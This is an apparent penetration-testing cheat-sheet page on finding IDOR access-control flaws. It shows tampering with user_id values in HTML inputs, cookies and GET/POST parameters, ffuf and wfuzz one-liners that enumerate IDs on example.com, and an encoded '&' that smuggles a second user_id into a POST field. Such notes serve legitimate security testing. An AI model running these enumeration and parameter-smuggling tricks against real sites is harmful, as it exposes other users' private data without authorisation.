Exploit Notes

IDOR (Insecure Direct Object References) Attack

Last modified: 2023-03-03

Web

IDOR is a type of access control vulnerability in web applications.

Find Vulnerabilities from HTML Source Code

First check values of attrivutes on input elements.

<input name="user_id" value="8" >

Then try what will happen when you change the Cookie value in a HTTP header.

Cookie: user_id=12

Change GET Parameters

Manual

/user?id=1
/user?id=2

/admin/posts/1
/john/posts/1

/static/1.txt
/static/2.txt

Automation

seq 0 100 | ffuf -u https://example.com/user?id=FUZZ -w -

wfuzz -z file,./numbers.txt https://example.com/user?id=FUZZ

Change POST Parameters

address=1&user_id=1
address=1&user_id=2

# URL Encode '&'
address=1%26user_id=2

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.